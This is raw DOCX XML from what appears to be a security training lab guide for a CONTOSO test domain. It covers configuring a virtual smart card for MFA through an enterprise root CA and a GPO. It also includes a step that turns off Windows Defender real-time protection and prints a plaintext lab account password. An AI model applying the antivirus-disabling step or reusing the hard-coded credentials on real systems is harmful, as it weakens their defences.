      <w:r w:rsidRPr="00810D05">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> and set "</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Turn off real-time protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">" to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE52A7">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Disable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D73DB9F" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0" w:rsidP="00ED41C0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlink the two existing GPO at domain level: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Lab-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Disable_WD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Lab-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Disable_WU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ED41C0" w14:paraId="59C74F4A" w14:textId="77777777" w:rsidTr="00BB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0BD5088" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0" w:rsidP="00BB3100">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED41C0" w14:paraId="17B77A70" w14:textId="77777777" w:rsidTr="00BB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39BA93" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0" w:rsidP="00BB3100">
            <w:r>
              <w:t>Save a report of the GPO you have created</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A2D8EDB" w14:textId="77777777" w:rsidR="00ED41C0" w:rsidRDefault="00ED41C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BFF2BC" w14:textId="0306AFAF" w:rsidR="00DC6DB9" w:rsidRDefault="00DC6DB9" w:rsidP="00DC6DB9">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc44075691"/>
      <w:r w:rsidRPr="00F20CB2">
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F20CB2">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005A04A0">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:t>virtual smart card as MFA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="63589102" w14:textId="5C2D128A" w:rsidR="00DC6DB9" w:rsidRDefault="00D43F61" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
        <w:t>In this lab you will configure a Virtual Smart Card to avoid using password for logon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D1F29" w14:textId="639F7547" w:rsidR="00D43F61" w:rsidRDefault="00D43F61" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77630632" w14:textId="0ED4E399" w:rsidR="005B47D7" w:rsidRDefault="005B47D7" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
        <w:t>As pre-requisite, you must set an email address for account John Doe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C294B" w14:textId="6D471C96" w:rsidR="005B47D7" w:rsidRDefault="005B47D7" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B47D7">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AAEC1B4" wp14:editId="66F5583D">
            <wp:extent cx="2076316" cy="270897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3126" cy="2717856"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C208D11" w14:textId="77777777" w:rsidR="005B47D7" w:rsidRPr="00C6425D" w:rsidRDefault="005B47D7" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C90D92" w14:textId="421F135E" w:rsidR="00DC6DB9" w:rsidRDefault="003C1F17" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Hello for Business is the next evolution, but in some </w:t>
      </w:r>
      <w:r w:rsidR="00983813">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>cases,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> relying on </w:t>
      </w:r>
      <w:r w:rsidR="00983813">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Virtual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00983813">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Smartcard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VSC) might be useful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36D3EA" w14:textId="7B6C9EE2" w:rsidR="0025217C" w:rsidRDefault="0025217C" w:rsidP="003B03E3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492C6CB3" w14:textId="07A263ED" w:rsidR="00DE5D82" w:rsidRDefault="00482067" w:rsidP="005937BF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>VICTIM-SRV</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE5D82">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Certification Authority installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11182D01" w14:textId="071EF1BC" w:rsidR="0025217C" w:rsidRDefault="00974BF9" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Logon on </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>VICTIM-SRV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>sccmagent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:r w:rsidR="00504D73" w:rsidRPr="00504D73">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Cyber-Pwd2018###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22974EAA" w14:textId="19557A6B" w:rsidR="00974BF9" w:rsidRDefault="00974BF9" w:rsidP="005937BF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>ADCS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Active Directory Certificate Services) role with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Add Role and Features</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wizard of the Sever Manager console: selection only the service ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Certification Authority’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACF689" w14:textId="1E78C7B8" w:rsidR="00974BF9" w:rsidRDefault="00504D73" w:rsidP="005937BF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">After role installation, run the AD CS Configuration wizard, select </w:t>
      </w:r>
      <w:r w:rsidR="00DE5D82">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>CONTOSO\Administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> account, then service “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Certification Authority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="005937BF">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">, with </w:t>
      </w:r>
      <w:r w:rsidR="005937BF" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Enterprise CA</w:t>
      </w:r>
      <w:r w:rsidR="005937BF">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidR="005937BF" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Root CA</w:t>
      </w:r>
      <w:r w:rsidR="005937BF">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> options. Give </w:t>
      </w:r>
      <w:r w:rsidR="005937BF" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO-CA</w:t>
      </w:r>
      <w:r w:rsidR="005937BF">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> name for Certification Authority. Let the default options for the rest of the wizard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759FDABA" w14:textId="4F0D90CD" w:rsidR="00482067" w:rsidRDefault="00482067" w:rsidP="005937BF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Certification Authority</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> console, right click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO-CA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">, select </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Properties</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab, then </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>View Certificate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">. In Certificate properties, go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab and click on “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Copy to file…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00322271">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">. In the certificate export wizard, select </w:t>
      </w:r>
      <w:r w:rsidR="00322271" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>DER</w:t>
      </w:r>
      <w:r w:rsidR="00322271">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoding option and click </w:t>
      </w:r>
      <w:r w:rsidR="00322271" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:r w:rsidR="00322271" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00322271">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Give </w:t>
      </w:r>
      <w:r w:rsidR="00CE0D78" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>c:\</w:t>
      </w:r>
      <w:r w:rsidR="00322271" w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>CONTOSO-CA.cer</w:t>
      </w:r>
      <w:r w:rsidR="00322271">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> file name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F492D8C" w14:textId="5DB928E8" w:rsidR="00943360" w:rsidRDefault="00943360">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23632466" w14:textId="0BB1335E" w:rsidR="00482067" w:rsidRDefault="00322271" w:rsidP="00460453">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>VICTIM-DC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Administrator account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF73D96" w14:textId="0E9149AB" w:rsidR="00934470" w:rsidRDefault="00934470" w:rsidP="00460453">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Create a new Group Policy Object named Contoso-PKI at domain level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C3ED20" w14:textId="4F44D78D" w:rsidR="00934470" w:rsidRDefault="00934470" w:rsidP="00460453">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure policy in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Computer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Windows Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Security Settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Public Key Policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Trusted Root Certification Authorities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">. Right click and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005E9670" w14:textId="77777777" w:rsidR="00934470" w:rsidRDefault="00934470" w:rsidP="00460453">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Import wizard, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> then select </w:t>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00FC45FE">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:cs="Segoe UI"/>
          </w:rPr>
          <w:t>\\VICTIM-SRV\c$\CONTOSO-CA.cer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">, then </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>. Ensure the targeted container is “</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Trusted Root Certification Authorities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">”, then click </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>Finish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6031488D" w14:textId="77777777" w:rsidR="00482067" w:rsidRPr="00C6425D" w:rsidRDefault="00482067" w:rsidP="00C6425D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D77B872" w14:textId="1024E8B8" w:rsidR="00DE5D82" w:rsidRDefault="00F54A3B" w:rsidP="00E257C0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:b/>
        </w:rPr>
        <w:t>VICTIM-SRV</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3100">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE5D82">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t>Configure Smartcard logon template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE6956" w14:textId="25DBF914" w:rsidR="00DE5D82" w:rsidRDefault="00DE5D82">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Start / </w:t>
      </w:r>
      <w:r w:rsidR="00E257C0">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
        </w:rPr>
